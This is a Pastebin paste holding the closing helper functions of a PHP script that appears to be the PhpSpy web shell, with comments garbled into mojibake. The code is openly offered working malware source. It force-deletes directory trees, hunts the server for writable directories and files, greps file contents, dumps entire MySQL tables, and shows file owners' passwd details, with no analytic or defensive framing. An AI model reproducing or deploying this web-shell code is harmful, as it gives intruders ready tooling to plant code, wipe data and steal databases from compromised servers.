 1806.         $array = @posix_getpwuid(@fileowner($filepath));
 1807.         if ($array && is_array($array)) {
 1808.             return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';
 1809.         }
 1810.     }
 1811.     return '';
 1812. }
 1813.  
 1814. // ɾ³ýĿ¼
 1815. function deltree($deldir) {
 1816.     $mydir=@dir($deldir);  
 1817.     while($file=$mydir->read()) {      
 1818.         if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) {
 1819.             @chmod($deldir.'/'.$file,0777);
 1820.             deltree($deldir.'/'.$file);
 1821.         }
 1822.         if (is_file($deldir.'/'.$file)) {
 1823.             @chmod($deldir.'/'.$file,0777);
 1824.             @unlink($deldir.'/'.$file);
 1825.         }
 1826.     }
 1827.     $mydir->close();
 1828.     @chmod($deldir,0777);
 1829.     return @rmdir($deldir) ? 1 : 0;
 1830. }
 1831.  
 1832. // ±í¸ñÐмäµÄ±³¾°É«Ìæ»»
 1833. function bg() {
 1834.     global $bgc;
 1835.     return ($bgc++%2==0) ? 'alt1' : 'alt2';
 1836. }
 1837.  
 1838. // »ñÈ¡µ±Ç°µÄÎļþϵͳ·¾¶
 1839. function getPath($scriptpath, $nowpath) {
 1840.     if ($nowpath == '.') {
 1841.         $nowpath = $scriptpath;
 1842.     }
 1843.     $nowpath = str_replace('\\', '/', $nowpath);
 1844.     $nowpath = str_replace('//', '/', $nowpath);
 1845.     if (substr($nowpath, -1) != '/') {
 1846.         $nowpath = $nowpath.'/';
 1847.     }
 1848.     return $nowpath;
 1849. }
 1850.  
 1851. // »ñÈ¡µ±Ç°Ä¿Â¼µÄÉϼ¶Ä¿Â¼
 1852. function getUpPath($nowpath) {
 1853.     $pathdb = explode('/', $nowpath);
 1854.     $num = count($pathdb);
 1855.     if ($num > 2) {
 1856.         unset($pathdb[$num-1],$pathdb[$num-2]);
 1857.     }
 1858.     $uppath = implode('/', $pathdb).'/';
 1859.     $uppath = str_replace('//', '/', $uppath);
 1860.     return $uppath;
 1861. }
 1862.  
 1863. // ¼ì²éPHPÅäÖòÎÊý
 1864. function getcfg($varname) {
 1865.     $result = get_cfg_var($varname);
 1866.     if ($result == 0) {
 1867.         return 'No';
 1868.     } elseif ($result == 1) {
 1869.         return 'Yes';
 1870.     } else {
 1871.         return $result;
 1872.     }
 1873. }
 1874.  
 1875. // ¼ì²éº¯ÊýÇé¿ö
 1876. function getfun($funName) {
 1877.     return (false !== function_exists($funName)) ? 'Yes' : 'No';
 1878. }
 1879.  
 1880. // »ñµÃÎļþÀ©Õ¹Ãû
 1881. function getext($file) {
 1882.     $info = pathinfo($file);
 1883.     return $info['extension'];
 1884. }
 1885.  
 1886. function GetWDirList($dir){
 1887.     global $dirdata,$j,$nowpath;
 1888.     !$j && $j=1;
 1889.     if ($dh = opendir($dir)) {
 1890.         while ($file = readdir($dh)) {
 1891.             $f=str_replace('//','/',$dir.'/'.$file);
 1892.             if($file!='.' && $file!='..' && is_dir($f)){
 1893.                 if (is_writable($f)) {
 1894.                     $dirdata[$j]['filename']=str_replace($nowpath,'',$f);
 1895.                     $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
 1896.                     $dirdata[$j]['dirchmod']=getChmod($f);
 1897.                     $dirdata[$j]['dirperm']=getPerms($f);
 1898.                     $dirdata[$j]['dirlink']=$dir;
 1899.                     $dirdata[$j]['server_link']=$f;
 1900.                     $j++;
 1901.                 }
 1902.                 GetWDirList($f);
 1903.             }
 1904.         }
 1905.         closedir($dh);
 1906.         clearstatcache();
 1907.         return $dirdata;
 1908.     } else {
 1909.         return array();
 1910.     }
 1911. }
 1912.  
 1913. function GetWFileList($dir){
 1914.     global $filedata,$j,$nowpath, $writabledb;
 1915.     !$j && $j=1;
 1916.     if ($dh = opendir($dir)) {
 1917.         while ($file = readdir($dh)) {
 1918.             $ext = getext($file);
 1919.             $f=str_replace('//','/',$dir.'/'.$file);
 1920.             if($file!='.' && $file!='..' && is_dir($f)){
 1921.                 GetWFileList($f);
 1922.             } elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){
 1923.                 if (is_writable($f)) {
 1924.                     $filedata[$j]['filename']=str_replace($nowpath,'',$f);
 1925.                     $filedata[$j]['size']=sizecount(@filesize($f));
 1926.                     $filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
 1927.                     $filedata[$j]['filechmod']=getChmod($f);
 1928.                     $filedata[$j]['fileperm']=getPerms($f);
 1929.                     $filedata[$j]['fileowner']=getUser($f);
 1930.                     $filedata[$j]['dirlink']=$dir;
 1931.                     $filedata[$j]['server_link']=$f;
 1932.                     $j++;
 1933.                 }
 1934.             }
 1935.         }
 1936.         closedir($dh);
 1937.         clearstatcache();
 1938.         return $filedata;
 1939.     } else {
 1940.         return array();
 1941.     }
 1942. }
 1943.  
 1944. function GetSFileList($dir, $content, $re = 0) {
 1945.     global $filedata,$j,$nowpath, $writabledb;
 1946.     !$j && $j=1;
 1947.     if ($dh = opendir($dir)) {
 1948.         while ($file = readdir($dh)) {
 1949.             $ext = getext($file);
 1950.             $f=str_replace('//','/',$dir.'/'.$file);
 1951.             if($file!='.' && $file!='..' && is_dir($f)){
 1952.                 GetSFileList($f, $content, $re = 0);
 1953.             } elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){
 1954.                 $find = 0;
 1955.                 if ($re) {
 1956.                     if ( preg_match('@'.$content.'@',$file) || preg_match('@'.$content.'@', @file_get_contents($f)) ){
 1957.                         $find = 1;
 1958.                     }
 1959.                 } else {
 1960.                     if ( strstr($file, $content) || strstr( @file_get_contents($f),$content ) ) {
 1961.                         $find = 1;
 1962.                     }
 1963.                 }
 1964.                 if ($find) {
 1965.                     $filedata[$j]['filename']=str_replace($nowpath,'',$f);
 1966.                     $filedata[$j]['size']=sizecount(@filesize($f));
 1967.                     $filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
 1968.                     $filedata[$j]['filechmod']=getChmod($f);
 1969.                     $filedata[$j]['fileperm']=getPerms($f);
 1970.                     $filedata[$j]['fileowner']=getUser($f);
 1971.                     $filedata[$j]['dirlink']=$dir;
 1972.                     $filedata[$j]['server_link']=$f;
 1973.                     $j++;
 1974.                 }
 1975.             }
 1976.         }
 1977.         closedir($dh);
 1978.         clearstatcache();
 1979.         return $filedata;
 1980.     } else {
 1981.         return array();
 1982.     }
 1983. }
 1984.  
 1985. function qy($sql) {
 1986.     global $mysqllink;
 1987.     //echo $sql.'<br>';
 1988.     $res = $error = '';
 1989.     if(!$res = @mysql_query($sql,$mysqllink)) {
 1990.         return 0;
 1991.     } else if(is_resource($res)) {
 1992.         return 1;
 1993.     } else {
 1994.         return 2;
 1995.     }  
 1996.     return 0;
 1997. }
 1998.  
 1999. function q($sql) {
 2000.     global $mysqllink;
 2001.     return @mysql_query($sql,$mysqllink);
 2002. }
 2003.  
 2004. function fr($qy){
 2005.     mysql_free_result($qy);
 2006. }
 2007.  
 2008. function sizecount($fileSize) {
 2009.     $size = sprintf("%u", $fileSize);
 2010.     if($size == 0) {
 2011.         return '0 Bytes' ;
 2012.     }
 2013.     $sizename = array(' Bytes', ' KB', ' MB', ' GB', ' TB', ' PB', ' EB', ' ZB', ' YB');
 2014.     return round( $size / pow(1024, ($i = floor(log($size, 1024)))), 2) . $sizename[$i];
 2015. }
 2016. // ±¸·ÝÊý¾Ý¿â
 2017. function sqldumptable($table, $fp=0) {
 2018.     global $mysqllink;
 2019.  
 2020.     $tabledump = "DROP TABLE IF EXISTS `$table`;\n";
 2021.     $res = q("SHOW CREATE TABLE $table");
 2022.     $create = mysql_fetch_row($res);
 2023.     $tabledump .= $create[1].";\n\n";
 2024.  
 2025.     if ($fp) {
 2026.         fwrite($fp,$tabledump);
 2027.     } else {
 2028.         echo $tabledump;
 2029.     }
 2030.     $tabledump = '';
 2031.     $rows = q("SELECT * FROM $table");
 2032.     while ($row = mysql_fetch_assoc($rows)) {
 2033.         foreach($row as $k=>$v) {
 2034.             $row[$k] = "'".@mysql_real_escape_string($v)."'";
 2035.         }
 2036.         $tabledump = 'INSERT INTO `'.$table.'` VALUES ('.implode(", ", $row).');'."\n";
 2037.         if ($fp) {
 2038.             fwrite($fp,$tabledump);
 2039.         } else {
 2040.             echo $tabledump;
 2041.         }
 2042.     }
 2043.     fwrite($fp,"\n\n");
 2044.     fr($rows);
 2045. }
 2046.  
 2047. function p($str){
 2048.     echo $str."\n";
 2049. }
 2050.  
 2051. function tbhead() {
 2052.     p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
 2053. }
 2054. function tbfoot(){
 2055.     p('</table>');
 2056. }
 2057.  
 2058. function makehide($name,$value=''){
 2059.     p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
 2060. }
 2061.  
 2062. function makeinput($arg = array()){
 2063.     $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
 2064.     $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
 2065.     !$arg['type'] && $arg['type'] = 'text';
 2066.     $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
 2067.     $arg['class'] = $arg['class'] ? $arg['class'] : 'input';
 2068.     if ($arg['newline']) {
 2069.         p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
 2070.     } else {
 2071.         p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
 2072.     }
 2073. }
 2074.  
 2075. function makeselect($arg = array()){
 2076.     if ($arg['onchange']) {
 2077.         $onchange = 'onchange="'.$arg['onchange'].'"';
 2078.     }
 2079.     $arg['title'] = $arg['title'] ? $arg['title'] : '';
 2080.     if ($arg['newline']) p('<p>');
 2081.     p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
 2082.         if (is_array($arg['option'])) {
 2083.             if ($arg['nokey']) {
 2084.                 foreach ($arg['option'] as $value) {
 2085.                     if ($arg['selected']==$value) {
 2086.                         p("<option value=\"$value\" selected>$value</option>");
 2087.                     } else {
 2088.                         p("<option value=\"$value\">$value</option>");
 2089.                     }
 2090.                 }
 2091.             } else {
 2092.                 foreach ($arg['option'] as $key=>$value) {
 2093.                     if ($arg['selected']==$key) {
 2094.                         p("<option value=\"$key\" selected>$value</option>");
 2095.                     } else {
 2096.                         p("<option value=\"$key\">$value</option>");
 2097.                     }
 2098.                 }
 2099.             }
 2100.         }
 2101.     p("</select>");
 2102.     if ($arg['newline']) p('</p>');
 2103. }
 2104. function formhead($arg = array()) {
 2105.     global $self;
 2106.     !$arg['method'] && $arg['method'] = 'post';
 2107.     !$arg['action'] && $arg['action'] = $self;
 2108.     $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
 2109.     !$arg['name'] && $arg['name'] = 'form1';
 2110.     p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
 2111.     if ($arg['title']) {
 2112.         p('<h2>'.$arg['title'].' &raquo;</h2>');
 2113.     }
 2114. }
 2115.    
 2116. function maketext($arg = array()){
 2117.     !$arg['cols'] && $arg['cols'] = 100;
 2118.     !$arg['rows'] && $arg['rows'] = 25;
 2119.     $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
 2120.     p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
 2121. }
 2122.  
 2123. function formfooter($name = ''){
 2124.     !$name && $name = 'submit';
 2125.     p('<p><input class="bt" name="'.$name.'" id="'.$name.'" type="submit" value="Submit"></p>');
 2126.     p('</form>');
 2127. }
 2128.  
 2129. function goback(){
 2130.     global $self, $nowpath;
 2131.     p('<form action="'.$self.'" method="post"><input type="hidden" name="action" value="file" /><input type="hidden" name="dir" value="'.$nowpath.'" /><p><input class="bt" type="submit" value="Go back..."></p></form>');
 2132. }
 2133.  
 2134. function formfoot(){
 2135.     p('</form>');
 2136. }
 2137.  
 2138. function encode_pass($pass) {
 2139.     $pass = md5('angel'.$pass);
 2140.     $pass = md5($pass.'angel');
 2141.     $pass = md5('angel'.$pass.'angel');
 2142.     return $pass;
 2143. }
 2144.  
 2145. function pr($s){
 2146.     echo "<pre>".print_r($s).'</pre>';
 2147. }
 2148.  
 2149. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top